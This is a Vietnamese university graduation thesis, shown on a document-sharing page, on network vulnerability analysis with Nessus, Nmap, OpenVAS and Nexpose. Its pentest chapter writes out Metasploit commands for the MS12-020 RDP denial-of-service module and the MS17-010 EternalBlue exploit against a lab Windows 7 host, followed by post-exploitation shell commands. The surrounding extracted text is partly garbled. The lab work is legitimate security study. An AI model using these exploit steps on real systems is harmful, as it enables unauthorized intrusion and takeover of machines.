1. Trang chủ
  2. » Công Nghệ Thông Tin

Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus

87 38 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 87
Dung lượng 12,7 MB

Nội dung

Đồ Án Tốt Nghiệp Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Họ tên ĐỒ ÁN TỐT NGHIỆP NGÀNH CÔNG NGHỆ THÔNG TIN ĐỀ TÀI NGHIÊN CỨU, PHÂN TÍCH LỖ HỔNG BẢO MẬT TRÊN HỆ THỐNG MẠNG HÀ NỘI 2022. Nghiên cứu và triển khai công cụ bảo mật Nessus

BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC MỎ ĐỊA CHẤT Họ tên ĐỒ ÁN TỐT NGHIỆP NGÀNH CÔNG NGHỆ THƠNG TIN ĐỀ TÀI NGHIÊN CỨU, PHÂN TÍCH LỖ HỔNG BẢO MẬT TRÊN HỆ THỐNG MẠNG HÀ NỘI - 2022 BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC MỎ ĐỊA CHẤT Họ tên ĐỒ ÁN TỐT NGHIỆP CHUYÊN NGÀNH MẠNG MÁY TÍNH ĐỀ TÀI NGHIÊN CỨU, PHÂN TÍCH LỖ HỔNG BẢO MẬT TRÊN HỆ THỐNG MẠNG Sinh viên thực Giảng viên hướng dẫn Hà Nội - 2022 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính MỤC LỤC LỜI MỞ ĐẦU CHƯƠNG : TỔNG QUAN VỀ AN NINH MẠNG 10 1.1 Giới thiệu chung an ninh mạng .10 1.1.1 Điểm yếu loại lỗ hổng bảo mật 10 1.1.1.1 Lỗ hổng theo khu vực phát sinh 11 1.1.1.2 Lỗ hổng phát sinh khiếm khuyết hệ thống thông tin 11 1.1.1.3 Lỗ hổng theo vị trí phát .12 1.1.1.4 Lỗ hổng biết, lỗ hổng zero-day .13 1.1.2 Một số phương thức công mạng 14 1.1.2.1 Tấn cơng vào trình duyệt (Browse Attacks) .14 1.1.2.2 Tấn công phần mềm độc hại .15 1.1.2.3 Tấn công từ chối dịch vụ ( DDoS Attacks ) .16 1.1.2.4 Kiểu công sâu bọ ( Worn Attacks ) 17 1.1.2.5 Tấn công sở liệu ( SQL injection ) 18 1.1.2.6 Kiểu công rà quét 19 1.1.2.7 Kiểu công mạng khác 19 1.2 Các giải pháp công cụ hỗ trợ bảo mật mạng 19 1.2.1 Các giải pháp bảo mật mạng .19 1.2.1.1 Giải pháp tường lửa 19 1.2.1.2 Giải pháp chống xâm nhập chống công từ chối dịch vụ (DDoS) 20 1.2.1.3 Giải pháp mã hóa bảo mật đường truyền 21 1.2.1.4 Giải pháp giám sát phân tích mã độc 21 1.2.1.5 Giải pháp chống spam/virus mức gateway 22 Họ tên Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính 1.2.2 Một vài cơng cụ hỗ trợ bảo mật mạng internet .22 1.2.2.1 Công cụ Nmap 22 1.2.2.2 Công cụ Wireshark 23 1.2.2.3 Công cụ Nessus 24 1.2.2.4 Công cụ OpenVAS 25 1.2.2.5 Công cụ Kerio Control 26 CHƯƠNG : GIỚI THIỆU CHUNG VỀ CÔNG CỤ NESSUS 28 2.1 Tổng quan ngôn ngữ NASL 28 2.1.1 Lịch sử hình thành 28 2.1.2 Điểm khác biệt NASL1 NASL2 30 2.1.3 NASL2 ngôn ngữ thông dịch, tựa C 31 2.1.4 Cấu trúc ngôn ngữ NASL2 .31 2.2 Xây dựng Plugin cho Nessus .31 2.2.1 Thông dịch script tự xây dựng 31 2.2.2 Thử nghiệm script .32 2.3 Giới thiệu chung công cụ Nessus 36 2.3.1 Lịch sử hình thành 36 2.3.2 Giới thiệu công cụ Nessus 36 2.4 Các tính cơng cụ Nessus .37 2.5 Các thành phần mô hình Nessus .38 2.5.1 Các thành phần Nessus: .38 2.5.2 Các mơ hình Nessus 38 2.5.2.1 Nessus với mơ hình Client – Server 39 2.5.2.2 Mơ hình Nessus Plugin 40 2.5.2.3 Mơ hình Nessus Knowledge Base .41 2.6 Cài đặt Nessus môi trường window .42 2.6.1 Yêu cầu: 42 2.6.2 Cài đặt 42 Họ tên Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính 2.7 Cài đặt Nessus môi trường Kali Linux 45 2.7.1 Yêu cầu .45 2.7.2 Cài đặt 45 2.8 Hướng dẫn sử dụng .48 CHƯƠNG TRIỂN KHAI NESSUS VÀ MỘT SỐ CÔNG CỤ KHÁC .54 3.1 Mơ hình triển khai Nessus 54 3.2 Các bước triển khai .55 3.2.1 Triển khai quét lỗ hổng Website .55 3.2.2 Triển khai quét lỗ hổng mạng LAN 59 3.2.3 Triển khai quét khám phá máy chủ( Host discovery ) .61 3.2.4 Triển khai quét lỗ hổng Advance Scan .62 3.2.4.1 Quét Advance Win 62 3.2.4.2 Quét Advance Win 10 64 3.2.4.3 Quét Advance Win Server2016 66 3.2.4.4 Quét Advance Linux 68 3.3 Công cụ nmap .69 3.4 Công cụ OpenVAS 72 3.5 Công cụ Raid7 Nexpose 73 3.6 Điểm đáng ý Nessus so công cụ khác 74 3.7 Penetration Testing( Kiểm thử thâm nhập) 75 3.7.1 CVE MS12-020 76 3.7.2 CVE MS17-010 80 Kết Luận 83 TÀI LIỆU THAM KHẢO .84 Họ tên Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính DANH MỤC CÁC HÌNH VẼ Hình 1-1: Tấn cơng vào trình duyệt web 17 Hình 1-2: Tấn cơng phần mềm độc hại .18 Hình 1-3: Tấn công từ chối dịch vụ Dos 19 Hình 1-4: Tấn cơng kiểu sâu bọ 19 Hình 1-5: Tấn cơng sở liệu SQL injection 20 Hình 1-6: Giải pháp tường lửa 22 Hình 1-7: Sử dụng DdoS hacker 23 Hình 1-8: Giao diện cơng cụ Nmap 25 Hình 1-9: Giao diện cơng cụ WireShark 26 Hình 1-10: Giao diện Nessus .27 Hình 1-11: Giao diện OpenVAS 28 Hình 1-12: Cơng cụ KeriControl 29 Hình 2-1: Địa host FTP tuyensinhvietnam.vn 36 Hình 2-2: Kết banner trả host FTP tuyensinhvietnam.vn 37 Hình 2-3: Mơ hình Client – Server .42 Hình 2-4: Mơ hình Nessus Plugin 43 Hình 2-5: Cài đặt Nessus 44 Hình 2-6: Điều khoản Nessus 45 Hình 2-7: Nơi lưu trữ Nessus .45 Hình 2-8: Tải xuống Nessus .46 Hình 2-9: Cài đặt hồn tất 47 Hình 2-10: Các phiên cài đặt Nessus web 48 Hình 2-11: Kiểm tra cài đặt Nessus Linux .49 Hình 2-12: Hồn tất cà đặt Nessus Linux 49 Hình 2-13: Truy cập Nessus web client linux .50 Hình 2-14: Giao diện lựa chọn version Nessus 51 Họ tên Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 2-15: Đăng ký tài khoản Nessus 52 Hình 2-16: Nhập code activation .53 Hình 2-17: Tạo username password cho Nessus 54 Hình 2-18: Giao diện Nessus web client 55 Hình 3-1: Mơ hình triển khai Nessus 56 Hình 3-2: Scan Templates 57 Hình 3-3: Điền thông tin Web Application 57 Hình 3-4: Chọn port scan 58 Hình 3-5: Chế độ quét lỗ hổng 59 Hình 3-6: Tiến hành quét lỗ hổng .59 Hình 3-7: Kết quét lỗ hổng web 60 Hình 3-8: Độ nghiêm trọng giải pháp lỗ hổng .60 Hình 3-9: Quét mạng lỗ hổng LAN 61 Hình 3-10: Kiểm tra ip LAN 62 Hình 3-11: Mức độ giải pháp lỗ hổng mạng LAN 62 Hình 3-12: Quét host discovery 63 Hình 3-13: Kết quét host port mà host mở 63 Hình 3-14: Advance Scan Window 64 Hình 3-15: Kết quét win 65 Hình 3-16: Tạo Scan advance Win 10 66 Hình 3-17: Kết scan advance win 10 67 Hình 3-18: Advance Scan Window Server 2016 68 Hình 3-19: Kết Advance Window Server 2016 .69 Hình 3-20: Quét Advance máy Kali Linux 70 Hình 3-21: Kết scan Advance Kali Linux 71 Hình 3-22: Giao diện nmap window 72 Hình 3-23: Giao diện CLI dịng lệnh linux 72 Hình 3-24: Quét nmap window(zenmap) 73 Họ tên Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-25: Scan lỗ hổng dải mạng nội Kali Linux 74 Hình 3-26: Giao diện Web UI OpenVAS khởi động 75 Hình 3-27: Giao diện Web UI Raid7 Nexpose khởi động 76 Hình 3-28: Quét cổng nmap win7 .79 Hình 3-29: Giao diện metasploit 80 Hình 3-30: Setup cơng máy Window 81 Hình 3-31: Kết ta cơng máy Window 81 Hình 3-32: Check lỗ hổng MS17-010 nmap 82 Hình 3-33: Check CVE MS17-010 82 Hình 3-34: Tìm module cơng lỗ hổng ms17-010 83 Hình 3-35: Đã chiếm quyền điều khiển tử xa win7 83 Họ tên Lớp Mạng máy tính Đồ án tốt nghiệp chun ngành Mạng Máy Tính THƠNG TIN KẾT QUẢ NGHIÊN CỨU Thông tin chung Tên đề tài: Nghiên cứu phân tích lỗ hổng bảo mật hệ thống mạng Sinh viên thực hiện: Lớp: Mạng máy tính Hệ đào tạo: Chính quy Điện thoại: Email: Thời gian thực hiện: Năm 2022 Mục tiêu - Nắm vững hiểu bảo mật mạng - Hiểu công cụ bảo mật giải pháp mạng Nessus vài cơng cụ khác Nội dung - Chương 1: Tổng quan an ninh mạng - Chương 2: Giới thiệu cộng cụ Nessus - Chương 3: Triển khai Nessus số công cụ khác Kết đạt Báo cáo đồ án tốt nghiệp Triển khai công cụ Nessus bảo mật mạng Hiểu, biết lỗ hổng bảo mật, cách triển khai pentest tìm vấn để khắc phục lỗ hổng Họ tên Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính LỜI MỞ ĐẦU Chúng ta Thế Giới trải qua biến động dội thời đại công nghệ từ cách mạng 1.0, 2.0, 3.0 cách mạng 4.0 mà giới ý tới Trong thời đại công nghệ việc bảo mật an tồn thơng tin khơng gian mạng vô quan trọng cấp thiết mà quan tâm tới Như biết nay, Việt Nam bước đầu áp dụng nhiều công nghệ tiên tiến giới công nghiệp, nông nghiệp dịch vụ, đặc biệt ứng dụng cơng nghệ 4.0 điện tốn đám mây, trí tuệ nhân tạo, người máy Chính phủ Việt Nam tạo hành lang pháp lý thuận lợi, tạo điều kiện cho phát triển khoa học công nghệ nói chung CMCN 4.0 nói riêng, có luật chuyển giao công nghệ, công nghệ cao, sở hữu trí tuệ Nhiều chuyên gia cho rằng, để nắm bắt kịp CMCN 4.0 cần yếu tố Thứ thể chế lãnh đạo, vai trị người đứng đầu quan trọng Thứ hai hệ thống giáo dục, đào tạo nhân lực số Thứ ba thể chế thúc đẩy sáng tạo sáng tạo doanh nghiệp phải trung tâm - tức tính thực dụng phải cao Thứ tư an ninh mạng, an ninh kết nối, vấn đề lớn, thách thức tồn cầu Việt Nam khơng quỹ đạo Bây giờ, Việt Nam xếp vị trí thứ giới với gần 60 triệu người dùng Facebook Tình hình an ninh mạng nước ta ngày diễn biến phức tạp, đặt nhiều nguy thách thức khơng nhiệm vụ phịng ngừa, đấu tranh hoạt động sử dụng không gian mạng để kích động biểu tình, phát tán thơng tin xấu, độc, vu khống, sai thật, bảo vệ bí mật nhà nước khơng gian mạng, phịng chống lợi dụng mạng để tiến hành hoạt động khủng bố, tuyên truyền chống phá chế độ Nhiều hệ thống thông tin quan trọng an ninh quốc gia (hệ thống thơng tin Chính phủ, bộ, tổ chức, ngân hàng, lượng, hàng không ) trở thành mục tiêu công thường xuyên tin tặc Mỗi năm có hàng chục ngàn cơng nhằm vào quan phủ, hệ thống tài chính, ngân hàng, hạ tầng thơng tin trọng yếu, trang web quan tổ chức, doanh nghiệp Việt Nam nhằm đánh cắp thơng tin, bí mật nhà nước, thành tựu khoa học công nghệ, sở hữu trí tuệ Các loại virus, mã độc, vũ khí mạng xuất ngày nhiều, số loại thiết kế chuyên biệt, nguy hiểm Trong đó, hệ thống mạng thơng tin nước ta cịn nhiều lỗ hổng bảo mật nghiêm trọng, không kiểm tra, đánh giá thường xun Khả phịng, chống cơng mạng hệ Họ tên 10 Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Ta quét thử zenmap ip 192.168.0.128 máy window ta thấy port tcp thông số phiên mở window Hình 3-54: Quét nmap window(zenmap) Bên nmap giao diện CLI linux ta dùng câu lệnh: sudo nmap –T4 –F 192.168.0.0/24 ta quét nhanh lấy thông tin port mở dải mạng nội Họ tên 73 Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-55: Scan lỗ hổng dải mạng nội Kali Linux 3.4 Công cụ OpenVAS Trong số cơng cụ qt lỗ hổng OpenVAS công cụ quét lỗ hổng giống nessus OpenVAS công cụ mã nguồn mở Được cài đặt linux sử dụng giao diện website nessus Họ tên 74 Lớp Mạng máy tính Đồ án tốt nghiệp chun ngành Mạng Máy Tính Hình 3-56: Giao diện Web UI OpenVAS khởi động Đối với phần mềm em có tìm hiểu cơng cụ hỗ trợ hệ điều hành Linux chưa có hỗ trợ hệ điều hành Window 3.5 Cơng cụ Raid7 Nexpose Raid7 Nexpose công cụ scan tìm lỗ hổng bảo mật khác cơng cụ kể Cơng cụ có hỗ trợ cho Window với Linux Có điều bất tiện cơng cụ cơng cụ trả phí Và khơng có phiên miễn phí Nessus cần phải có quyền để sử dụng trọn vẹn Họ tên 75 Lớp Mạng máy tính Đồ án tốt nghiệp chun ngành Mạng Máy Tính Hình 3-57: Giao diện Web UI Raid7 Nexpose khởi động 3.6 Điểm đáng ý Nessus so công cụ khác Trong mục cơng cụ Nmap cơng cụ xếp thành loại khác so với cơng cụ cịn lại Nmap dùng để qt cổng (port) lỗ hổng bảo mật Nhưng mục đích chủ yếu Nmap quét cổng tìm điểm yếu mạng máy client Để phục vụ cho mục đích fix lỗi ( quản trị viên, hacker mũ trắng) công ( hacker mũ đen ) Để so sánh với đánh giá với Nessus cơng cụ có điểm khác biệt khơng giống nên ta khó đánh giá cơng cụ điểm mạnh Nếu so việc khai thác lỗ hổng để cơng hệ thống Nmap cơng cụ vượt trội hẳn Còn mặt quản trị, giám sát hệ thơng, khắc phục cố Nessus phù hợp Đối với cơng cụ cịn lại so với Nessus chúng có điểm tương đồng Đều trình quét quản lý sử dụng giao diện Web UI - Về mặt sử dụng: o Nessus đánh giá dễ dàng sử dụng Các chế độ scan đơn giản tối ưu hóa với người sử dụng dành cho người người có kinh nghiệm Họ tên 76 Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính o Cịn OpenVAS Nexpose cơng cụ có chế độ quét phức tạp địi hỏi phải cấu hình chế độ cần thiết cho đối tượng muốn quét Về mặt phổ biến: o Nessus có số lượng người dùng, cộng đồng lớn Đối tượng phổ biến - người dùng cá nhân doanh nghiệp o Nexpose công cụ phổ biến số cơng cụ Ít người sử dụng số công cụ o Cơng cụ OpenVAS có số lượng người dùng nằm mức trung bình Cộng đồng khơng q lớn Nessus Về mặt chi phí tương thích: o Nessus có phiên có phí khơng phí ( hạn chế số tính - có giới hạn quét 16 ip miễn phí, phiên phù hợp dành cho người dùng cá nhân, học sinh, sinh viên nghiên cứu) Về phiên có phí giá 3400$/năm Nessus tương thích hầu hết hệ điều hành bao gồm Windows, Linux Mac OS o OpenVAS công cụ mã nguồn mở hồn tồn miễn phí dành cho tất người OpenVAS có phiên dành cho Linux, cịn Window Mac OS chưa hỗ trợ dùng o Nexpose có phiên trả phí ta đăng ký cho phép dùng thử vài ngày theo quy định Mức phí Nexpose tính dựa IP scan 500 ip 24$/năm Nexpose tương thích hầu hết hệ điều hành phổ biến Không bị hạn chế mặt hệ điều hành Về mặt chức năng: o Nessus có nhiều chế độ scan ta sử dụng phiên trả phí Ta có - thể sử dụng lên đến 30 chế độ scan loại lỗ hổng o OpenVAS Nexpose số lượng chế độ scan cịn hạn chế khơng đầy đủ cịn hạn chế chế độ scan lỗ hổng Ở chủ yếu chế độ 3.7 Penetration Testing( Kiểm thử thâm nhập) Đối với hầu hết hệ thống q trình Pentest khơng thể thiếu để phân tích khắc phục lỗ hổng Mơ hình triển khai: Họ tên 77 Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Cần chuẩn bị: - máy công cài đặt hệ điều hành Kali Linux để sử dụng công cụ Metasploit (công cụ tích hợp sẵn Kali Linux ) máy cài đặt hệ điều hành Window (phiên cịn có nhiều người dùng có mã lỗi dễ bị công) máy đặt mạng LAN Window tắt tường lửa để dễ dàng kiểm thử - Mơ hình triển khai Nessus Window Kali Linux Window 3.7.1 CVE MS12-020 Ở lần quét trước phiên win Ta có tìm thấy lỗ hổng nghiêm trọng MS12-020 Lỗ hổng Remote Desktop Cloud cho phép điều khiển code từ xa mà không yêu cầu xác thực Cách thức thực hiện: Đối với lỗ hổng ta sử dụng cơng cụ Metasploit có sẵn Kali Linux cài đặt Windows Ta sử dụng Nmap để quét cổng Win7 Đối với trường hợp khác ta phải scan dải mạng để tìm máy lỗ hổng Ở ta có sẵn win7 có địa ip: 192.168.0.128 Họ tên 78 Lớp Mạng máy tính Đồ án tốt nghiệp chun ngành Mạng Máy Tính Hình 3-58: Qt cổng nmap win7 Ta thấy cổng 3389 win7 mở Tiếp theo ta bắt đầu khai thác công cụ metasploit Họ tên 79 Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-59: Giao diện metasploit Ta sử dụng lệnh để khai thác công: use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set rhost 192.168.0.128 -> đặt ip rhost máy nạn nhân set lhost 192.168.0.133 -> đặt ip lhost máy công Run -> để khởi chạy Họ tên 80 Lớp Mạng máy tính Đồ án tốt nghiệp chun ngành Mạng Máy Tính Hình 3-60: Setup công máy Window Họ tên 81 Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-61: Kết ta cơng máy Window 3.7.2 CVE MS17-010 Lỗ hổng nằm mức độ nghiêm win7 Đối với số máy khác khơng biết máy nạn nhân có dính CVE khơng ta sử dụng nmap để kiểm tra lệnh : nmap -vv -Pn -T4 script vuln [ip máy cần quét] Họ tên 82 Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-62: Check lỗ hổng MS17-010 nmap Ms17-010 mô tả phần kết Nmap scan lỗ hổng xuất phát từ server SMBv1 Windows SMB thường sử dụng port 139 445 Hoặc chắn ta thử check lại metasploit ta sử dụng lệnh: use auxiliary/scanner/smb/smb_ms17_010 options ( Để xem câu lệnh chế độ ) set rhosts 192.168.0.128 run Hình 3-63: Check CVE MS17-010 Ta dùng lệnh: search ms17-010 để tìm module cơng Họ tên 83 Lớp Mạng máy tính Đồ án tốt nghiệp chun ngành Mạng Máy Tính Hình 3-64: Tìm module cơng lỗ hổng ms17-010 use exploit/windows/smb/ms17_010_eternalblue set rhost 192.168.0.128 set lhost 192.168.0.133 set lport 8888 run Hình 3-65: Đã chiếm quyền điều khiển tử xa win7 Họ tên 84 Lớp Mạng máy tính Đồ án tốt nghiệp chun ngành Mạng Máy Tính Sau hồn thành ta thấy chiếm quyền điều khiển từ xa máy Win7 Từ câu lệnh: whoami ( check xem có quyền cao không ) Systeminfo ( check thông tin máy chiếm quyền ) Mkdir ( tạo thư mục) Rmdir ( xóa thư mục) Type nul > tenfile ( tạo file txt) Họ tên 85 Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Kết Luận Qua báo cáo đồ án em ta thấy Việc bảo mật hệ thống hay phát để phòng chống lỗ hổng bảo mật vô quan trọng cá nhân doanh nghiệp Tránh trường hợp xảy vấn đề tìm cách khắc phục để dẫn đến hậu khơng đáng có gây thiệt hại nặng nề hệ thống, tiền bạc Hiện nay, với doanh nghiệp làm việc cần có internet chi phí đầu tư sở vật chất vào hệ thống mạng không nhỏ Vậy nên vấn đề bảo mật mạng vô cấp thiết quan trọng Họ tên 86 Lớp Mạng máy tính Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính TÀI LIỆU THAM KHẢO [1] Michel Arboi, “The NASL2 reference manual”, Revision 1.65, 2005 [2] Russ Rogers, Mark Carey, Paul Criscuolo, Mike Petruzzi, “Nessus Network Auditing, Second Edition”, Syngress Publishing, Inc ISBN 13: 978-1-59749-2089, 2008 [3] “Nessus 5.0 User Guide”, Tenable Network Security, Inc Revision 6, 2012 [4] https://whitehat.vn/threads/huong-cai-dat-Nessus-tren-kali-linux.7603/ [5] https://vnpro.vn/thu-vien/tong-quan-lo-hong-bao-mat-va-mot-soky-thuat- tan-cong-vao-mang-2443.html [6] https://whitehat.vn/threads/Nessus-%E2%80%93-cong-cu-tro-giuppentest- he-thong.6871/ Họ tên 87 Lớp Mạng máy tính ... phần mềm khai thác lỗ hổng bảo mật đời để giúp chuyên gia lĩnh vực an ninh mạng phân tích bảo mật hệ thống “Nghiên cứu phân tích lỗ hổng bảo mật hệ thống mạng? ?? đề tài em chọn đồ án tốt nghiệp Vì... hổng hệ điều hành (lỗ hổng hệ thống tệp, lỗ hổng chế độ tải, lỗ hổng chế quản lý quy trình…), lỗ hổng hệ thống quản lý sở liệu Lỗ hổng phần mềm ứng dụng Lỗ hổng phần mềm chuyên dùng tức lỗ hổng. .. ninh mạng - Chương 2: Giới thiệu cộng cụ Nessus - Chương 3: Triển khai Nessus số công cụ khác Kết đạt Báo cáo đồ án tốt nghiệp Triển khai công cụ Nessus bảo mật mạng Hiểu, biết lỗ hổng bảo mật,

Ngày đăng: 10/10/2022, 13:35

HÌNH ẢNH LIÊN QUAN

Hình 1-2: Tấn cơng bằng phần mềm độc hại 1.1.2.3 Tấn công từ chối dịch vụ ( DDoS Attacks ) - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 1 2: Tấn cơng bằng phần mềm độc hại 1.1.2.3 Tấn công từ chối dịch vụ ( DDoS Attacks ) (Trang 18)
Hình 1-3: Tấn công từ chối dịch vụ Dos 1.1.2.4 Kiểu tấn công sâu bọ ( Worn Attacks ) - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 1 3: Tấn công từ chối dịch vụ Dos 1.1.2.4 Kiểu tấn công sâu bọ ( Worn Attacks ) (Trang 19)
Hình 1-5: Tấn cơng cơ sở dữ liệu SQL injection - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 1 5: Tấn cơng cơ sở dữ liệu SQL injection (Trang 20)
Hình 1-7: Sử dụng DdoS của hacker 1.2.1.3 Giải pháp mã hóa và bảo mật đường truyền - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 1 7: Sử dụng DdoS của hacker 1.2.1.3 Giải pháp mã hóa và bảo mật đường truyền (Trang 23)
Hình 1-8: Giao diện cơng cụ Nmap 1.2.2.2 Công cụ Wireshark - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 1 8: Giao diện cơng cụ Nmap 1.2.2.2 Công cụ Wireshark (Trang 25)
Hình 2-13: Địa chỉ host FTP của tuyensinhvietnam.vn - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 13: Địa chỉ host FTP của tuyensinhvietnam.vn (Trang 36)
Hình 2-14: Kết quả banner trả về của host FTP tuyensinhvietnam.vn - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 14: Kết quả banner trả về của host FTP tuyensinhvietnam.vn (Trang 37)
Hình 2-15: Mơ hình Client – Server 2.5.2.2 Mơ hình Nessus Plugin - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 15: Mơ hình Client – Server 2.5.2.2 Mơ hình Nessus Plugin (Trang 42)
Hình 2-17: Cài đặt Nessus - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 17: Cài đặt Nessus (Trang 44)
Hình 2-18: Điều khoản Nessus - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 18: Điều khoản Nessus (Trang 45)
Hình 2-21: Cài đặt hồn tất - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 21: Cài đặt hồn tất (Trang 46)
Hình 2-20: Tải xuống Nessus - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 20: Tải xuống Nessus (Trang 46)
Hình 2-22: Các phiên bản cài đặt Nessus trên web - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 22: Các phiên bản cài đặt Nessus trên web (Trang 47)
Hình 2-23: Kiểm tra và cài đặt Nessus trên Linux - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 23: Kiểm tra và cài đặt Nessus trên Linux (Trang 48)
Hình 2-24: Hoàn tất cà đặt Nessus trên Linux - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 24: Hoàn tất cà đặt Nessus trên Linux (Trang 49)
Hình 2-27: Đăng ký tài khoản Nessus - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 2 27: Đăng ký tài khoản Nessus (Trang 52)
Hình 3-33: Điền các thơng tin về Web Application - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 33: Điền các thơng tin về Web Application (Trang 57)
Hình 3-34: Chọn port scan - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 34: Chọn port scan (Trang 58)
Hình 3-35: Chế độ quét lỗ hổng - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 35: Chế độ quét lỗ hổng (Trang 58)
Hình 3-36: Tiến hành quét lỗ hổng - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 36: Tiến hành quét lỗ hổng (Trang 59)
Hình 3-38: Độ nghiêm trọng và giải pháp lỗ hổng - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 38: Độ nghiêm trọng và giải pháp lỗ hổng (Trang 60)
Hình 3-40: Kiểm tra ip LAN - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 40: Kiểm tra ip LAN (Trang 61)
Hình 3-43: Kết quả của quét host và các port mà host đang mở - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 43: Kết quả của quét host và các port mà host đang mở (Trang 63)
Hình 3-46: Tạo Scan advance Win 10 - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 46: Tạo Scan advance Win 10 (Trang 66)
Hình 3-48: Advance Scan Window Server2016 - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 48: Advance Scan Window Server2016 (Trang 68)
Hình 3-51: Kết quả scan Advance Kali Linux - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 51: Kết quả scan Advance Kali Linux (Trang 71)
Hình 3-52: Giao diện của nmap trên window - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 52: Giao diện của nmap trên window (Trang 72)
Hình 3-53: Giao diện CLI dịng lệnh của linux - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 53: Giao diện CLI dịng lệnh của linux (Trang 72)
Hình 3-54: Quét bằng nmap window(zenmap) - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 54: Quét bằng nmap window(zenmap) (Trang 73)
Hình 3-64: Tìm module tấn cơng lỗ hổng ms17-010 use exploit/windows/smb/ms17_010_eternalblue - Đồ Án Tối Nghiệp: Phân tích lỗ hổng bảo mật trên hệ thống mạng và công cụ Nessus
Hình 3 64: Tìm module tấn cơng lỗ hổng ms17-010 use exploit/windows/smb/ms17_010_eternalblue (Trang 84)

TỪ KHÓA LIÊN QUAN

TRÍCH ĐOẠN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w